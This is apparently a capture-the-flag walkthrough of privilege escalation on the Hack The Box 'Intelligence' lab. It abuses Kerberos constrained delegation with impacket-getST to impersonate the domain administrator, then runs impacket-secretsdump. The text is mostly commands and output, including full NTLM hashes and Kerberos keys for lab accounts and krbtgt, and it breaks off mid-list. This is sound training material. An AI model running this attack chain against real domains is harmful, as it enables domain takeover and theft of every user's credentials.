Intelligence_Privilege_Escalation

Kerberos Constrained Delegation (KCD) Attack

---

Referring to the earlier domain assessment with BloodHound, the svc_int$ account is allowed to delegate to the WWW/dc.intelligence.htb SPN Now that I have [[Intelligence_Lateral_Movement_svc_int#validation|compromised]] the `svc_int` account, I can attempt to exploit this delegation

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=svc_int\$@dc.intelligence.htb.ccache powerview 'INTELLIGENCE.HTB/@dc.intelligence.htb' --no-pass -k --dc-ip $IP -q 'Get-DomainObject svc_int$' | grep -i delegate 
[2023-09-27 08:42:25] LDAP Signing NOT Enforced!
msds-allowedtodelegateto           : WWW/dc.intelligence.htb

The delegation could also be check with PowerView by looking further into the svc_int$ “object”

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=svc_int\$@dc.intelligence.htb.ccache impacket-findDelegation 'intelligence.htb/svc_int$' -k -no-pass -dc-ip $IP -dc-host dc.intelligence.htb
Impacket v0.11.0 - Copyright 2023 Fortra
 
AccountName  AccountType                          DelegationType                      DelegationRightsTo      
-----------  -----------------------------------  ----------------------------------  -----------------------
svc_int$     ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  WWW/dc.intelligence.htb 

impacket-findDelegation additionally shows the delegation type; Constrained w/ Protocol Transition

This would mean that I could just perform Kerberos Constrained Delegation attack

full s4u2 (self + proxy)

---

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=svc_int\$@dc.intelligence.htb.ccache impacket-getST 'intelligence.htb/svc_int$' -k -no-pass -spn 'WWW/dc.intelligence.htb' -impersonate administrator -dc-ip $IP -debug
Impacket v0.11.0 - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[+] Using Kerberos Cache: svc_int$@dc.intelligence.htb.ccache
[+] Returning cached credential for KRBTGT/INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: svc_int$
[*] Impersonating administrator
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=INTELLIGENCE.HTB
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   svc_int$
 
 cusec=78988
 ctime=20230927065734Z
 
 
 
[+] S4UByteArray
 0000   01 00 00 00 61 64 6D 69  6E 69 73 74 72 61 74 6F   ....administrato
 0010   72 69 6E 74 65 6C 6C 69  67 65 6E 63 65 2E 68 74   rintelligence.ht
 0020   62 4B 65 72 62 65 72 6F  73                        bKerberos
[+] CheckSum
 0000   7B 34 F9 84 52 3E 32 F2  F7 55 52 AB AF 4C 79 D4   {4..R>2..UR..Ly.
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator
 
 userRealm=intelligence.htb
 cksum=Checksum:
  cksumtype=-138
  checksum=0x7b34f984523e32f2f75552abaf4c79d4
 
 auth-package=Kerberos
 
[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=0x6e8204c1308204bda003020105a10302010ea20703050000000000a382042f6182042b30820427a003020105a1121b10494e54454c4c4947454e43452e485442a2253023a003020101a11c301a1b066b72627467741b10494e54454c4c4947454e43452e485442a38203e3308203dfa003020112a103020102a28203d1048203cd2bbff00386c657b1b7f558507eba08fa6df58bb7865d46d64172e016eb6e17fd0c4834ad85ee3bdb1d8bb443da2ba21204fb5cb4a272d7061b31df4c88280538a368ad327d9ab562424c127a3cb467203a81f353a84cb3ad5115e5c44d82738ab41b284e7bb136dd1359d08235c6ab4ef2a38cc5272f98785826d844fdaf418b4087de32b819647a19c73f3be7e07bb3bdb61965494166f0a43faf7b978e5eb2ab8c98d978cd8a22f0bdcd3289dd7a13c288d3c29199c6e4514be16f9c11080af0bd106d47df992f0859c953389973bf42f80aca7e13b8bc1674f8b073d71baf12849d057c7c2cd6af9dece8ef46afff1a59b9d9bc767f7567083c74f554fd3a596004b6ee3c41bcb89d8639cbfca6beafc4fe566d48b3f56c00cb5a4e5858ef66b93eb9afc2caf5690f4822d4dc497f9c79a9a47337badcfb017712394aed7de0f5443dc8622b26fb1bfd4f56e84d44cfd3de75835a93df6a6eb8fd5c00807e55aeb0076c4e784a736d00b8c8fa0e219f89742f21282dbf54b73ac1474cca47978206e90ef3c80abe39f4c83edb674f3140362f9e24014e7a16883040a2027afc5fd52ca1c3b78bedf125b8c5a631dd9d67f1bdab0b716303f28964a5eaf97b16bebe1b5d4629b77a647d02927b1123e3d29c8eeba44b974dd66522693164f7213a13de70046c292813ca76bc8b0204edf91a1ed08eb0da53e3708a78d666dc7a586067f955527a58f60a1095e23afa245e1fa83175ef0967af092e270fb860b7a88fbdf3a22d963e4e83d363f04e6fe55815f433a22b7263f2b358d99c7ac20ce9b5ccd3e23796a7e84d4fc74a6e34490979c4ae3c7f280b23eeca9efcb746260c0f524ba8255455a0cc706cc64cfe459769dcc4f2fabfd2b74e4e7dfe7ee94c8bb76b697c3c002fd1f31516e1d945ee41b69a40d3c9f910cea09bfba30765546dee61de89c3325d37bf8f5334dbb987d3e0d737813d1e85802d330e09dc4dcba32ceff0fe122d929bad6a0ebaa28ad180bcffa6821779904ae04b762694fb6bed3c68af8fa956749fc10e1895da94cee19a033cc037217410d42fc61073733f96e2d2cc74b767fa555b4a4ea1f1e0a3d5b858826a2f4b4b23de08d4d8f3d9aa642ba0ef71c9abec475a630ff6fc523660f6af8821e7f55ecdbc626cdf40ac1acdf79089aeb3dd3e99044b9a6a6133772b6d437daabfcc8a1e411719c6ad144037a36593ef1a75d1163a3d7675320a013b8fc72d73d9a43cd725eaeb64feb8521d96be4e49101408fdbab2bdb3339209889f3d0e9abb0e84a3aab934dcc8d87c8ac5e5cea8617b8e5cba4caffd8743a992cd224537ab5934e780adbbacd122fb92573cfb318784644f78224ca4753073a003020112a26c046ae28a960a2637f36d2b4504f839dab073f5d49dde1b062ff16421f005624ec0957996a1f0b344e5425acce4ed616ef8c20798d215bfceb138151271d2d29d831fbfb3b8326288328b40610915c421cfb0ba0c2a893831cb47a178f670af55940c2985b5f38d9500c5f8f0
  PA_DATA:
   padata-type=129
   padata-value=0x305aa01a3018a003020101a111300f1b0d61646d696e6973747261746f72a1121b10696e74656c6c6967656e63652e687462a21c301aa0040202ff76a11204107b34f984523e32f2f75552abaf4c79d4a30a1b084b65726265726f73
 
 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=INTELLIGENCE.HTB
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    svc_int$
 
  till=20230928065734Z
  nonce=721618508
  etype=SequenceOf:
   18   23
 
 
[*] 	Requesting S4U2self
[+] Trying to connect to KDC at 10.10.10.248:88
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=intelligence.htb
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator
 
 ticket=Ticket:
  tkt-vno=5
  realm=INTELLIGENCE.HTB
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    svc_int$
 
  enc-part=EncryptedData:
   etype=18
   kvno=4
   cipher=0x7b1cd2c4f88b01b14df147d56c4ee8b0caea64c74a174615adb7c41f7ad02ff353859fa51ebb08151c4caf1d5aa4b26637ede493419546243380affe8949d07480f26d8e22fbef7765b2b8757b08ab1a7243d1bf3efb4446c234a68b5548fdfc62380ea337b5719f09287844bf54e32829ca199bb70c1d62b3c2a4d2f39a719d846c20e5e528fe3f29d213872cb3a7a0f8257dac240190c9e8dc988debb87fa578f70ec1b531f608b69f76377e998f41183c05ba2b1d16e1b57e1da9b7b20449f3bd35d1d9b9ab8c14dbc327b2bfdb70922fd61d395804d0d4a710baffd5e4334809e8052759580b8dc0940fcb77887962fb0575a497601036f4ba015b128acae3b732348ba886733dedca410daf7eec0a5bbec146370e09e08a906b86047caada870dbeff4561ebeec34812fc27b4a04da3fec6aab4d56e6bd20657db08271a2cfd7385fca9fcdb5434b57002ccde2a19dc125ea1ae73ba17b107e4797a74b5a7638a94ed577ef74453f412ee3040d1e34b93e9693a63105144fc301906448f895754aab4e048d853d0e2fd04c387f84b691de777e2b7a39d32fb37dd179df0282c56e55355c50544c4e5f90ab8cf187e6e6a5721b1da42b088adfe6b182c28864e2d50c61d5e350000d641ff0458fbf317cdd6689a725043a9376115dab4b8002df185a10be01e3aed6b95ea633e0e9ccefce46b2d4951e087fc2679a5f5807b6c60ed327d83846bce3721fd5daa35291ea532a467cb2dff4834aad578ee8024dc5dca68474cdd3f02578a410a6c35ec6c1abbff05cd9067e4d03528b8c7fc8099e3b13a80aed3adef4e46a208d1a254f78b00a4b8c34a3b3b1fa7b8601cad52a654fcd4ea33eab71a081492e784adc031df3c0d8eb6fe01d12eef20ad34071d420ed2f08784ce8d100e7cacee8a707b26877e61e5c2ca2f1eb0faa5a278d5b47f7b796427997f8cc00006387d414ade2cfe53e06d302047f05dede0ba358adb2428a2d79f42e0af5da9a345fde78a8b31549f84b3206ea2217c4af205fa6c03fed413336722dd1d9a12feb3d9006ceeaec52fe50541524d52ded63066f95c06f9248305b2ead21cc3b06a6b618bfff896b4f498896996f32855a393293a3908c19d59ca66ef37bcbc4adfe406bbcccf52ef871ef13ea6908d842e16b126ae5d93fc60fc1e99008c7c009629df82043d0e0492043419c6be104eef5b8642982937fe5f1b0f8e0223f103ebc0084d1203a8e16710349c12432a10f5265bef336a7c1f01b10c53abe6b6cb3a4b5de4fa445f4f28ba668e358ca9b6bffc7cb9c1be8a8009d7e493ecfd6404a43c69dd30b20f55f7dc34189dba3e89fccd814bb8a2cefb69b5decdbde25f1ab190011877252e6e43fbc5821d83782b8a56e3cde24ceb00968b1c9ab2da714a4f8b33e20c21d4acfcb998f0c150a604028dcba93a9e8b8b6925a939df5d96f076cb6ba0f75a6f767099255cf5f28c40dd58dabb3902f2f307d8200aa973912e463fea6b89968b95129ccfe08294ec314a43643f1b639d41127aabf3be703c8a531054b7164905
 
 
 enc-part=EncryptedData:
  etype=18
  cipher=0x89f8b51efd529ed12c7b58e5859288ab33e5fb3ae274bb746371ffffd0a435a50f75ef5515767340d6a05fc15764a469bd95f36497f3df53a0c4fea35d5f9088688f9eb35691f54a26febeb7091290051bfb0ee8725ab939672bd1e25cc0fc600a08ee5927cc4c8c314f7090cd18a91026c5e8933277f046f5625d82587cf945798edb1b052c11666c90b70f1609848876a93e39ee6edade494835946d935391fbd6fd396a498fae65d319fba0ef01ee70efa04b95661f661a8a80b9fc4d9e264dd5cf6683a69acbd8cf2a85c69c1644bde08639fd7a5a0abb9427d613a842177355ebf393036595017f4246cd2f6c4af88f7735ac240782ef319f1113b0272d6c7938db5d391b6cf6
 
 
[*] 	Requesting S4U2Proxy
[+] Trying to connect to KDC at 10.10.10.248:88
[*] Saving ticket in administrator.ccache

Impersonating the administrator user from the svc_int$ account, leveraging the delegation set to the msDS-AllowedToDelegateTo attribute in the WWW/dc.intelligence.htb SPN of the svc_int$ account

The obtained TGT of the administrator user would allow me to perform any action as the user

Hashdump

---

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump intelligence.htb/@dc.intelligence.htb -no-pass -k -dc-ip $IP         
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0xcae14f646af6326ace0e1f5b8b4146df
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:0054cc2f7ff3b56d9e47eb39c89b521f:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
intelligence\dc$:plain_password_hex:5a41b085ea9a580b61950d6216e940d4ba0bdcc38755d58994e788b5e36b467f0c799040c8a7618185dec2c0f9b3ca27d3dc206d7de822c3a5860e0eca1233cda3fc5b8f3e34493c49a5ff545d67a9f0912cfec2fd2dafb18b69b81a7774f31d2af09b1ba4f7dd7280dd12e1854c90eabab51dfd6216bb0d846f9dc3cb6002f3695809abf383540f95602ae8a393cf72dda1b3df5de5d92c700886caa34ca6de62bbeb4564aad8a2f1b3a5ed8b2004073edf9c726be9484eb76d23b6b015d46e42faefce971fb0d92c2ea08b40b8fa00c78d8d392a7cab933427b2bab77203a46edfefa8e73aeaf837326f7422b55c31
intelligence\dc$:aad3b435b51404eeaad3b435b51404ee:12db99ba9b02e3c4d4d091e5568a985b:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc3430503ab11d38db01911c159fe940bd8ec7cdb
dpapi_userkey:0x43fdd77605cdb58e14fb6a5c90c976fde8f4f2ea
[*] NL$KM 
 0000   16 C9 75 0F 89 FB F6 CD  00 43 BC 42 C3 58 4B 39   ..u......C.B.XK9
 0010   0F 08 5E E8 24 55 D1 75  52 8E C7 D6 0F 59 63 9A   ..^.$U.uR....Yc.
 0020   21 16 71 3E 7A 43 AE 23  46 96 4E 14 44 6B C7 F3   !.q>zC.#F.N.Dk..
 0030   a8 b7 ed 3a aa d3 72 94  96 64 01 9d 04 05 91 3e   ...:..r..d.....>
nl$km:16c9750f89fbf6cd0043bc42c3584b390f085ee82455d175528ec7d60f59639a2116713e7a43ae2346964e14446bc7f3a8b7ed3aaad372949664019d0405913e
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_4d83561cd4f50d4b311d35d8c070ea7b5a572ebd704982784225bd68febae815 
 0000   20 76 93 E8 53 4D 21 34  C9 D3 32 29 6E B3 AA AF    v..SM!4..2)n...
 0010   99 70 41 2A 77 5A 66 CC  99 23 26 1D DE 22 1B FD   .pA*wZf..#&.."..
 0020   DD 9D 5C 6D CC 74 38 49  CD BD 37 70 23 9A 33 24   ..\m.t8I..7p#.3$
 0030   14 6e b8 35 b5 24 2a 0d  50 2b d7 04 3a 44 32 c0   .n.5.$*.p+..:D2.
 0040   B4 97 95 16 29 0C 51 BA  8A 4C D0 68 4D 85 2D 92   ....).Q..L.hM.-.
 0050   1F BD 78 9C 03 69 FC 97  68 2C CE 95 50 16 A7 55   ..x..i..h,..P..U
 0060   EB 37 C7 AB BE 86 71 5A  3C 24 86 AE 1B 91 9A AD   .7....qZ<$......
 0070   17 9A D4 D5 4F DD 1B 0C  BD D5 64 5E 7D FD 79 23   ....O.....d^}.y#
 0080   A8 4E DF 6B FA EB DF E5  B7 80 90 55 A2 9B 4F 7C   .N.k.......U..O|
 0090   BC 69 04 8F 66 5C 1A 45  BC 87 9C C2 17 E0 62 F5   .i..f\.E......b.
 00a0   93 5B 25 E1 7C 16 35 E6  BB D3 1A 2C D6 2E 8D 5C   .[%.|.5....,...\
 00b0   78 51 B5 7A 2E 27 70 52  D8 A3 71 8C E8 9B A2 2C   xQ.z.'pR..q....,
 00c0   71 58 47 FB 0F DB 8E A9  D9 59 ED EB 27 AC 8B 15   qXG......Y..'...
 00d0   EF 49 6C 20 42 64 26 BB  42 23 0F 2C 4A E1 D4 43   .Il Bd&.B#.,J..C
 00e0   0E 04 A1 11 E1 F9 DB 3C  B6 8F 91 D7 62 E9 EE 6E   .......<....b..n
_sc_gmsa_dpapi_{c6810348-4834-4a1e-817d-5838604e6004}_4d83561cd4f50d4b311d35d8c070ea7b5a572ebd704982784225bd68febae815:207693e8534d2134c9d332296eb3aaaf9970412a775a66cc9923261dde221bfddd9d5c6dcc743849cdbd3770239a3324146eb835b5242a0d502bd7043a4432c0b4979516290c51ba8a4cd0684d852d921fbd789c0369fc97682cce955016a755eb37c7abbe86715a3c2486ae1b919aad179ad4d54fdd1b0cbdd5645e7dfd7923a84edf6bfaebdfe5b7809055a29b4f7cbc69048f665c1a45bc879cc217e062f5935b25e17c1635e6bbd31a2cd62e8d5c7851b57a2e277052d8a3718ce89ba22c715847fb0fdb8ea9d959edeb27ac8b15ef496c20426426bb42230f2c4ae1d4430e04a111e1f9db3cb68f91d762e9ee6e
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_4d83561cd4f50d4b311d35d8c070ea7b5a572ebd704982784225bd68febae815 
 0000   01 00 00 00 22 01 00 00  10 00 00 00 12 01 1A 01   ...."...........
 0010   12 56 0B F9 6B E3 54 1B  D2 54 A9 63 78 84 2B ED   .V..k.T..T.cx.+.
 0020   9B 42 09 51 D3 00 5B 2B  29 F4 B1 4B 95 FD FA 84   .B.Q..[+)..K....
 0030   69 0C CB DC 5C 2E 9D A7  66 A3 AF 71 17 95 76 D7   i...\...f..q..v.
 0040   32 9E 41 52 30 80 15 14  73 AE BB 80 8E 07 9B 81   2.AR0...s.......
 0050   C6 24 A9 51 B2 FD FA CF  FC C3 8F D2 AB 0E 86 27   .$.Q...........'
 0060   22 D9 A0 A0 93 FD 39 59  93 29 34 77 90 BB A1 FA   ".....9Y.)4w....
 0070   42 E7 FE 81 47 9B 0F D3  20 78 FD 2F AC 0F AD 08   B...G... x./....
 0080   A8 9B 5D 98 6F F4 AC A2  B9 36 73 F4 11 9F 45 01   ..].o....6s...E.
 0090   30 BC 74 8A 08 84 C6 65  11 4E 90 7D A1 E9 49 F3   0.t....e.N.}..I.
 00a0   4B 92 A9 9E 2D 38 0A 73  B4 20 3D 25 CF A2 41 AE   K...-8.s. =%..A.
 00b0   AD 3E 76 A2 17 CF 4A 44  98 AF 88 5E D8 77 80 E9   .>v...JD...^.w..
 00c0   75 AA BC 5D 6E 8A 75 BA  D5 89 D2 AD 70 5F E9 E1   u..]n.u.....p_..
 00d0   6B 41 20 1D 92 A2 1B 73  2C 20 30 03 3B 99 0F 0C   kA ....s, 0.;...
 00e0   FF 2A F8 D8 EE CE 04 F1  7D 32 13 1C C2 78 06 87   .*......}2...x..
 00f0   8D C8 8C B2 CC 60 87 FF  E7 B4 0F 60 E8 79 41 06   .....`.....`.yA.
 0100   3E B9 23 B4 F0 7F 76 A9  C2 57 BF D2 41 3C 55 79   >.#...v..W..A<Uy
 0110   00 00 1E E1 AC FB 8B 17  00 00 1E 83 DC 48 8B 17   .............H..
 0120   00 00                                              ..
_sc_gmsa_{84a78b8c-56ee-465b-8496-ffb35a1b52a7}_4d83561cd4f50d4b311d35d8c070ea7b5a572ebd704982784225bd68febae815:01000000220100001000000012011a0112560bf96be3541bd254a96378842bed9b420951d3005b2b29f4b14b95fdfa84690ccbdc5c2e9da766a3af71179576d7329e41523080151473aebb808e079b81c624a951b2fdfacffcc38fd2ab0e862722d9a0a093fd39599329347790bba1fa42e7fe81479b0fd32078fd2fac0fad08a89b5d986ff4aca2b93673f4119f450130bc748a0884c665114e907da1e949f34b92a99e2d380a73b4203d25cfa241aead3e76a217cf4a4498af885ed87780e975aabc5d6e8a75bad589d2ad705fe9e16b41201d92a21b732c2030033b990f0cff2af8d8eece04f17d32131cc27806878dc88cb2cc6087ffe7b40f60e87941063eb923b4f07f76a9c257bfd2413c557900001ee1acfb8b1700001e83dc488b170000
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9ce5f83a494226352bca637e8c1d6cb6:::
intelligence.htb\danny.matthews:1103:aad3b435b51404eeaad3b435b51404ee:9112464222be8b09d663916274dd6b61:::
intelligence.htb\jose.williams:1104:aad3b435b51404eeaad3b435b51404ee:9e3dbd7d331c158da69905a1d0c15244:::
intelligence.htb\jason.wright:1105:aad3b435b51404eeaad3b435b51404ee:01295a54d60d3d2498aa12d5bbdea996:::
intelligence.htb\samuel.richardson:1106:aad3b435b51404eeaad3b435b51404ee:fa7c1a2537f2094bd10e3eddc8e04612:::
intelligence.htb\david.mcbride:1107:aad3b435b51404eeaad3b435b51404ee:f7aacab8c61105a5d5f99382ace61ddf:::
intelligence.htb\scott.scott:1108:aad3b435b51404eeaad3b435b51404ee:b1279fc1d13e461ad3d81cbe5d79c7b5:::
intelligence.htb\david.reed:1109:aad3b435b51404eeaad3b435b51404ee:5093f8ee65ea9e45aa0c00294d2d2834:::
intelligence.htb\ian.duncan:1110:aad3b435b51404eeaad3b435b51404ee:54eecca1b18b2741d81c872e69d7683d:::
intelligence.htb\michelle.kent:1111:aad3b435b51404eeaad3b435b51404ee:8bcc0a6ef0f6af2d22c7cdb23916059b:::
intelligence.htb\jennifer.thomas:1112:aad3b435b51404eeaad3b435b51404ee:981ae8ccea28b73908b6fa84384f4b22:::
intelligence.htb\kaitlyn.zimmerman:1113:aad3b435b51404eeaad3b435b51404ee:b07a75753c543a62b723534a667c39f3:::
intelligence.htb\travis.evans:1114:aad3b435b51404eeaad3b435b51404ee:30dd4d476e41b06265b65733136fb36a:::
intelligence.htb\kelly.long:1115:aad3b435b51404eeaad3b435b51404ee:a7c756e91ca82214506b523d920e6832:::
intelligence.htb\nicole.brock:1116:aad3b435b51404eeaad3b435b51404ee:98613c903c14423b592661c4674044ae:::
intelligence.htb\stephanie.young:1117:aad3b435b51404eeaad3b435b51404ee:0ba0e6dbe23c31cea88cd59021ab2f86:::
intelligence.htb\john.coleman:1118:aad3b435b51404eeaad3b435b51404ee:a8d4315cab221a40f074ba324d81c030:::
intelligence.htb\thomas.valenzuela:1119:aad3b435b51404eeaad3b435b51404ee:9d154569044998e5288dbc8db23032b1:::
intelligence.htb\thomas.hall:1120:aad3b435b51404eeaad3b435b51404ee:2c605feb1ddfcc1428ac01604369f3eb:::
intelligence.htb\brian.baker:1121:aad3b435b51404eeaad3b435b51404ee:138417b615241fea307b3956882d7e32:::
intelligence.htb\richard.williams:1122:aad3b435b51404eeaad3b435b51404ee:a921c66a125732a106dceb8ced647961:::
intelligence.htb\teresa.williamson:1123:aad3b435b51404eeaad3b435b51404ee:2ae920ebb038642277ca04f8f86ddb9e:::
intelligence.htb\david.wilson:1124:aad3b435b51404eeaad3b435b51404ee:31549b056a43fcbdf65c70405e751de4:::
intelligence.htb\darryl.harris:1125:aad3b435b51404eeaad3b435b51404ee:730ad44839da160afa8bfd3f04a47a50:::
intelligence.htb\william.lee:1126:aad3b435b51404eeaad3b435b51404ee:64a67569a7f005abf8c7b24654f1f078:::
intelligence.htb\thomas.wise:1127:aad3b435b51404eeaad3b435b51404ee:ba93357ccfc73c0dbda18b9d9a97ca6a:::
intelligence.htb\veronica.patel:1128:aad3b435b51404eeaad3b435b51404ee:8d8cf98e6d4aae40aaa1c9ef4444368a:::
intelligence.htb\joel.crawford:1129:aad3b435b51404eeaad3b435b51404ee:f8b14fe0d95e5edb105115482c7bdb56:::
intelligence.htb\jean.walter:1130:aad3b435b51404eeaad3b435b51404ee:ea49f2855d90384ee026a9d09780a0de:::
intelligence.htb\anita.roberts:1131:aad3b435b51404eeaad3b435b51404ee:4e2f58237af2453a0ca050cd968fc0a3:::
intelligence.htb\brian.morris:1132:aad3b435b51404eeaad3b435b51404ee:ac7b0ea3c16cd6ff264aa85f329e7fd4:::
intelligence.htb\daniel.shelton:1133:aad3b435b51404eeaad3b435b51404ee:627d3ac82ca3ecfed61f34db98aa365f:::
intelligence.htb\jessica.moody:1134:aad3b435b51404eeaad3b435b51404ee:f6a67905a68c16059ac0aa7e99fbfd05:::
intelligence.htb\tiffany.molina:1135:aad3b435b51404eeaad3b435b51404ee:7749fa32e4679d5d071a8d2922675d68:::
intelligence.htb\james.curbow:1136:aad3b435b51404eeaad3b435b51404ee:cd24b204f3965c7b886b7c7d305d8ed8:::
intelligence.htb\jeremy.mora:1137:aad3b435b51404eeaad3b435b51404ee:ab2e8e327fb6353e732f17fb8156038c:::
intelligence.htb\jason.patterson:1138:aad3b435b51404eeaad3b435b51404ee:564c8835ccaa0b8f2c0523b7ea4b341d:::
intelligence.htb\laura.lee:1139:aad3b435b51404eeaad3b435b51404ee:d7130cfb6752d373280274d07a78cbaf:::
intelligence.htb\ted.graves:1140:aad3b435b51404eeaad3b435b51404ee:421001de12db5325304b41275a0407b9:::
dc$:1000:aad3b435b51404eeaad3b435b51404ee:12db99ba9b02e3c4d4d091e5568a985b:::
svc_int$:1144:aad3b435b51404eeaad3b435b51404ee:ff3418066942aa8bd228ea17dc71999a:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:75dcc603f2d2f7ab8bbd4c12c0c54ec804c7535f0f20e6129acc03ae544976d6
administrator:aes128-cts-hmac-sha1-96:9091f2d145cb1a2ea31b4aca287c16b0
administrator:des-cbc-md5:2362bc3191f23732
krbtgt:aes256-cts-hmac-sha1-96:99d40a110afcd64282082cf9d523f11f65b3d142078c1f3121d7fbae9a8c3a26
krbtgt:aes128-cts-hmac-sha1-96:49b9d45a7dd5422ad186041ba9d86a7e
krbtgt:des-cbc-md5:a237bfc8f7b58579
intelligence.htb\danny.matthews:aes256-cts-hmac-sha1-96:3470fddc02448815f231bf585fc00165304951d3b04414222be904af7c925473
intelligence.htb\danny.matthews:aes128-cts-hmac-sha1-96:72961eb071e69b594f649b2f0cfb38cf
intelligence.htb\danny.matthews:des-cbc-md5:98f7736bcb9dc81f
intelligence.htb\jose.williams:aes256-cts-hmac-sha1-96:e733cfef56e3fd37eadb3a8b2f0845c2d014ee26892680ed8878632e5019c4ab
intelligence.htb\jose.williams:aes128-cts-hmac-sha1-96:94cd916dee769a98ed763a5d864a4486
intelligence.htb\jose.williams:des-cbc-md5:d07f38548013d37f
intelligence.htb\jason.wright:aes256-cts-hmac-sha1-96:0facd3ad464e633b16454e5e3a2d14bf8460ecc1e39ce2c92788a444b3716f1c
intelligence.htb\jason.wright:aes128-cts-hmac-sha1-96:0e85a159ad7605f55817393006e9bd51
intelligence.htb\jason.wright:des-cbc-md5:9194da836e8c9238
intelligence.htb\samuel.richardson:aes256-cts-hmac-sha1-96:112469103d5114a5355c9db2d4d6d69a1d685390e5c1ec0f1c4c31ab89013b8d
intelligence.htb\samuel.richardson:aes128-cts-hmac-sha1-96:16658c2b56df4ed113950bca88fbddaf
intelligence.htb\samuel.richardson:des-cbc-md5:d63145758054980e
intelligence.htb\david.mcbride:aes256-cts-hmac-sha1-96:e820c31eda49f5f5044c0ab8cab56bc7b0ce67369ac5565564a80d9459aa2688
intelligence.htb\david.mcbride:aes128-cts-hmac-sha1-96:70f82063e0d751c578d3720b0c91c9d1
intelligence.htb\david.mcbride:des-cbc-md5:0ef11f6bce10f226
intelligence.htb\scott.scott:aes256-cts-hmac-sha1-96:965e3bdb31fddef7d225ee0f3bc29da8374b3fbc78db354172599c2d0bbc5a2d
intelligence.htb\scott.scott:aes128-cts-hmac-sha1-96:679d6a497c460af78feb18be86c906f0
intelligence.htb\scott.scott:des-cbc-md5:40ad61da9e13ec2a
intelligence.htb\david.reed:aes256-cts-hmac-sha1-96:c4deea07df497a77f6f84582704d304d0ee6a4d49ebd782c39a9a552fef1b2b5
intelligence.htb\david.reed:aes128-cts-hmac-sha1-96:138480edac273065ee620dcd03710dd3
intelligence.htb\david.reed:des-cbc-md5:e368e9f1e6d5dfa8
intelligence.htb\ian.duncan:aes256-cts-hmac-sha1-96:d58821922aab776c8f15c3213a84da5d070c9ad8134e69f8f1546558e18061d8
intelligence.htb\ian.duncan:aes128-cts-hmac-sha1-96:29fc796179d2a6626e96c1178ba414c3
intelligence.htb\ian.duncan:des-cbc-md5:3d49cdfb8ca24357
intelligence.htb\michelle.kent:aes256-cts-hmac-sha1-96:aaf5ba002819705fb89e5dcbaffedb2c4c0909dbf6dc2274eade8ba4c4c03c6f
intelligence.htb\michelle.kent:aes128-cts-hmac-sha1-96:c7b85b205732e43876e1b139559d088e
intelligence.htb\michelle.kent:des-cbc-md5:5279cbe91a37855b
intelligence.htb\jennifer.thomas:aes256-cts-hmac-sha1-96:3bf38c83a092897d6da8308fdf759125d0b04ef670419f9c1079687e05105013
intelligence.htb\jennifer.thomas:aes128-cts-hmac-sha1-96:c9b5fda759614149e75a7a694773c628
intelligence.htb\jennifer.thomas:des-cbc-md5:ecbc4aaecd64d6d9
intelligence.htb\kaitlyn.zimmerman:aes256-cts-hmac-sha1-96:4c96bddc73accb5b94105ddff69cca796a4b394836f6c5621ef9b063eeb0613a
intelligence.htb\kaitlyn.zimmerman:aes128-cts-hmac-sha1-96:b272f50bd0c5fc39eb4a16d8baa52ac3
intelligence.htb\kaitlyn.zimmerman:des-cbc-md5:f84f2af20454c704
intelligence.htb\travis.evans:aes256-cts-hmac-sha1-96:971c2ec7ea7608a702b256888d9f1c934edaae423c1dd903ce78a3665fb420e0
intelligence.htb\travis.evans:aes128-cts-hmac-sha1-96:f32b62ee858b6f2418f83ce0e0ef7724
intelligence.htb\travis.evans:des-cbc-md5:c8f46dd313c40df2
intelligence.htb\kelly.long:aes256-cts-hmac-sha1-96:b9f50686f16c21ed608acc6e8dabd9087b0a2ca2b5ed48ffab4e97f0ddcca58d
intelligence.htb\kelly.long:aes128-cts-hmac-sha1-96:780bc7c8cb901a9edcc946b37cfb4b3b
intelligence.htb\kelly.long:des-cbc-md5:25381cef0229914a
intelligence.htb\nicole.brock:aes256-cts-hmac-sha1-96:c0c526274cee689a0a4c824b6b37a9c75d2f67b0ebfa4b442730e9ebbbca2eec
